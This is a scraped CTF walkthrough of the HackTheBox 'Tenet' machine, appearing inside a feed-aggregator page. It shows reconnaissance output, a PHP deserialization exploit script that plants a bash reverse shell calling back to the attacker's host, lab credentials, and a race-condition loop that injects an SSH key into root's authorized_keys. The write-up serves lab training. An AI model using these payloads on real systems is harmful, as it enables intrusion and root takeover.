惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

T
Threatpost
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
Engineering at Meta
Engineering at Meta
T
The Blog of Author Tim Ferriss
Recent Announcements
Recent Announcements
G
Google Developers Blog
Google DeepMind News
Google DeepMind News
The Register - Security
The Register - Security
MongoDB | Blog
MongoDB | Blog
U
Unit 42
B
Blog
H
Hackread – Cybersecurity News, Data Breaches, AI and More
L
LangChain Blog
Stack Overflow Blog
Stack Overflow Blog
P
Privacy International News Feed
L
LINUX DO - 最新话题
博客园_首页
博客园 - Franky
大猫的无限游戏
大猫的无限游戏
小众软件
小众软件
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
T
Tor Project blog
V
Visual Studio Blog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
P
Privacy & Cybersecurity Law Blog
C
Cyber Attacks, Cyber Crime and Cyber Security
K
Kaspersky official blog
C
Cisco Blogs
博客园 - 【当耐特】
阮一峰的网络日志
阮一峰的网络日志
I
Intezer
罗磊的独立博客
MyScale Blog
MyScale Blog
Last Week in AI
Last Week in AI
A
About on SuperTechFans
G
GRAHAM CLULEY
Y
Y Combinator Blog
Microsoft Security Blog
Microsoft Security Blog
GbyAI
GbyAI
T
Threat Research - Cisco Blogs
P
Proofpoint News Feed
D
DataBreaches.Net
The Hacker News
The Hacker News
Spread Privacy
Spread Privacy
AWS News Blog
AWS News Blog
I
InfoQ
T
The Exploit Database - CXSecurity.com
Simon Willison's Weblog
Simon Willison's Weblog
博客园 - 叶小钗
Project Zero
Project Zero

Homepage on Aditya Telange

One Year with evil-winrm-py - A Retrospective Bypassing LinkedIn's Connection Privacy with a Simple Search Filter Making Dynamic Instrumentation Accessible with Frida UI Breaking Payload Encryption in Web Applications HackTheBox (HTB) - Escape HackTheBox (HTB) - Resolute HackTheBox (HTB) - Certified State of VMWare Workstation (Pro?) on Linux Android App Security Testing Lab with MobSleuth Android phone as a Webcam on Linux Breaking down Reverse shell commands HackTheBox (HTB) - Photobomb Merging AOSP Security Patches into Custom ROMs Primer on HTTP Security Headers Image Zoom-In effect with HUGO HackTheBox (HTB) - Legacy HackTheBox (HTB) - Lame Cryptohack - Keyed Permutations [5 pts] Cryptohack - Resisting Bruteforce [10 pts] Cryptohack - RSA Starter 1 [10 pts] Cryptohack - Base64 [10 pts] Cryptohack - Bytes and Big Integers [10 pts] Cryptohack - Hex [5 pts] Cryptohack- XOR Starter [10 pts] HackTheBox (HTB) - Horizontall HackTheBox (HTB) - Forge HackTheBox (HTB) - Previse HackTheBox (HTB) - BountyHunter HackTheBox (HTB) - Explore HackTheBox (HTB) - Cap HackTheBox (HTB) - Pit HackTheBox (HTB) - Knife HackTheBox (HTB) - Love HackTheBox (HTB) - Ready Watermarking images with HUGO My Github Project went viral! Cryptohack - ASCII [5 pts] Cryptohack - Finding Flags [2 pts] Cryptohack - Great Snakes [3 pts] Cryptohack - JWT Sessions [10 pts] Cryptohack - Network Attacks [5 pts] Cryptohack - Token Appreciation [5 pts] CAF's Android for MSM Basic Website Analytics with Vercel Github Actions as Temporary File Sharing Platform Addition of prebuilt APK - AOSP Rom Development External Link With target='_blank' in Hugo Markdown Setting Up Build Environment - AOSP Rom Development Getting Started - AOSP Rom Development Using Secure HTTP Headers with Vercel/Zeit Education and Certifications Link Tree ↟ | Aditya Telange Personal Projects Resume - Aditya Telange Security Acknowledgements About Me Graph View License Privacy Policy
HackTheBox (HTB) - Tenet
[Aditya Telange](https://x.com/adityatelange) · 2021-06-12 · via Homepage on Aditya Telange
Box Info
  • Name: Tenet
  • OS: Linux
  • Difficulty: Medium
  • IP: 10.10.10.223
  • Points: 30
  • Machine Creator: egotisticalSW

Introduction

Tenet is a fun box where we find a backup of a staging PHP file which loads external code via deserialization, which leads to code-execution and a reverse shell.

This leads to access to a script which the non-sudoer user can run to add ssh-key for getting root shell.

Reconnaissance

Making sure our box ip is in /etc/hosts file as

NMAP Scan

# Nmap 7.80 scan initiated Sat May 15 14:21:49 2021 as: nmap -sC -sV -oA namp 10.10.10.223
Nmap scan report for 10.10.10.223
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
|   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 15 14:22:21 2021 -- 1 IP address (1 host up) scanned in 32.25 seconds

NMAP scan shows us port 22 and 80 are open.

Surfing tenet.htb:80

  • We have a CMS system working on Wordpress

  • We also have 2 users: protagonist and neil.

  • On inspecting source-code of view-source:http://tenet.htb/ we see Wordpress v5.6

  • On http://tenet.htb/index.php/2020/12/16/logs/ we see a comment

This means we have a possibility of finding some ‘file’ or a ‘directory’ or a ‘subdomain’ named sator.

We should now look for any PHP file having sator in its name and some backup.

As a result we do find a new domain sator.tenet.htb which has a default Apache2 page. We also find a page under this domiain http://sator.tenet.htb/sator.php which says

  • We’ll add this domain to hosts file
10.10.10.223    tenet.htb sator.tenet.htb
  • Upon running gobuster on sator.tenet.htb we get a wordpress directory. This does mean that sator.tenet.htb is a staging/testing site.
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://sator.tenet.htb
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/05/15 14:45:20 Starting gobuster in directory enumeration mode
===============================================================
/wordpress            (Status: 301) [Size: 322] [--> http://sator.tenet.htb/wordpress/]
/server-status        (Status: 403) [Size: 280]

===============================================================
2021/05/15 14:59:46 Finished
  • We also need to find some ‘backup’ as mentioned in the comment by “neil”.

Backups in PHP are generally saved as filename.php.bak.

We find sator’s backup as http://sator.tenet.htb/sator.php.bak, which has the source-code for http://sator.tenet.htb/sator.php

sator.php.bak

<?php

class DatabaseExport
{
    public $user_file = 'users.txt';
    public $data = '';

    public function update_db()
    {
        echo '[+] Grabbing users from text file <br>';
        $this-> data = 'Success';
    }


    public function __destruct()
    {
        file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
        echo '[] Database updated <br>';
    //    echo 'Gotta get this working properly...';
    }
}

$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);

$app = new DatabaseExport;
$app -> update_db();


?>

Getting USER flag

Oh yes! unserialize()? We could have a php deserialization vulerability!!

Refer to this video by ippsec: Intro to PHP Deserialization / Object Injection

Let’s understand sator.php.bak’s code =>

  • DatabaseExport is a PHP class having 2 functions update_db and __destruct.
  • __destruct function is called when the object is destructed or the script is stopped or exited. That means PHP will automatically call this function at the end of the script.
  • $app is an object of class DatabaseExport.
  • $app -> update_db(); calls the update_db() function from its class.
  • Now the line $input = $_GET['arepo'] ?? ''; uses $_GET1 to collect data sent in the URL. The data can be sent as 'http://sator.tenet.htb/sator.php?arepo={data}
  • At $databaseupdate = unserialize($input);, the data received ($input) is converted back into actual data by unserialize()2.

This is where we will override the class definition of DatabaseExport so that we are benifitted from it ;)

Now what we have to do is, set the vars $user_file $data while PHP unserializes.

  • $user_file contains file name, which will be created by __destruct() function.
  • $data contains a PHP reverse shell to get a reverse shell at port 9000

We use the following script on our host machine which does:

  • creates a DatabaseExport class with custom variables.
  • Serializes and UrlEncodes am object of the class.
  • Sends a GET request to destination path.
  • Executes the created PHP file so that we could get a reverse shell.
// contents of getShell.php
<?php
class DatabaseExport
{
        public $user_file = 'touch.php';
        public $data = '<?php shell_exec("/bin/bash -c \'bash -i >& /dev/tcp/10.10.xx.xx/9000 0>&1\'"); ?>';

}

$xp = urlencode(serialize(new DatabaseExport));
echo $xp;
file_get_contents('http://sator.tenet.htb/sator.php?arepo='.$xp);
file_get_contents('http://sator.tenet.htb/touch.php');
?>

While listening for incomming connection with

kali@kaliubuntu$ nc -lvnp 9000

We run the getShell.php.

kali@kaliubuntu$ php getShell.php

And we get shell for user www-data

We know this site is using Wordpress as CMS. So 1st thing we do is check of valid credentials in the wordpress config files.

We find database username and pass in /var/www/html/wordpress/wp-config.php

We try via ssh for neil@tenet.htb with credentials neil:Opera2112. We get user neil’s shell..

We get the USER flag: user.txt


Getting ROOT flag

For escalating our privilages we run sudo -l, which gives:

So we now know that neil can run /usr/local/bin/enableSSH.sh with root privilages!

/usr/local/bin/enableSSH.sh contains the following code (I’ve stripped extra whitespace to make it look neat)

#!/bin/bash

checkAdded() {
    sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)
    if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then
        /bin/echo "Successfully added $sshName to authorized_keys file!"
    else
        /bin/echo "Error in adding $sshName to authorized_keys file!"
    fi
}

checkFile() {
    if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then
        /bin/echo "Error in creating key file!"
        if [[ -f $1 ]]; then /bin/rm $1; fi
        exit 1
    fi
}

addKey() {
    tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
    (umask 110; touch $tmpName)
    /bin/echo $key >>$tmpName
    checkFile $tmpName
    /bin/cat $tmpName >>/root/.ssh/authorized_keys
    /bin/rm $tmpName
}


key="ssh-rsa AAAAA3NzaG1yc2GAAAAGAQAAAAAAAQG+AMU8OGdqbaPP/Ls7bXOa9jNlNzNOgXiQh6ih2WOhVgGjqr2449ZtsGvSruYibxN+MQLG59VkuLNU4NNiadGry0wT7zpALGg2Gl3A0bQnN13YkL3AA8TlU/ypAuocPVZWOVmNjGlftZG9AP656hL+c9RfqvNLVcvvQvhNNbAvzaGR2XOVOVfxt+AmVLGTlSqgRXi6/NyqdzG5Nkn9L/GZGa9hcwM8+4nT43N6N31lNhx4NeGabNx33b25lqermjA+RGWMvGN8siaGskvgaSbuzaMGV9N8umLp6lNo5fqSpiGN8MQSNsXa3xXG+kplLn2W+pbzbgwTNN/w0p+Urjbl root@ubuntu"
addKey
checkAdded

Working of enableSSH.sh:

  • It has a hardcoded ssh-key in it.
  • It is copied in /tmp/ssh-XXXXXXXX any random file name starting with ssh-.
  • It is then appended into /root/.ssh/authorized_keys.
  • It then checks whether this key is added succesfully or not.

What we need to do here is overwrite the ssh-XXXXXXXX file before the script appends it in /root/.ssh/authorized_keys 😵‍💫

We use the following bash script to overright the /tmp/ssh-XXXX .. files.

# spam our ssh-key in all `/tmp/ssh-XXXX` files.
while :
do
echo "ssh-rsa AAAAB██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████= kali@kaliubuntu" | tee /tmp/ssh* > /dev/null;
done

What the above bash script does is repeatedly adds our pre generated ssh-key to all the files starting with /tmp/ssh so that while we run enableSSH.sh their key is replaced with our key and we can login.

We run the above script on tenet box and simultaneouly we run enableSSH.sh many times and voila!!

neil@tenet:~$ sudo /usr/local/bin/enableSSH.sh

⚠️ This is a hit and miss type of activity as the key needs to be replaced after the ssh-key file is created and before it is appended to /root/.ssh/authorized_keys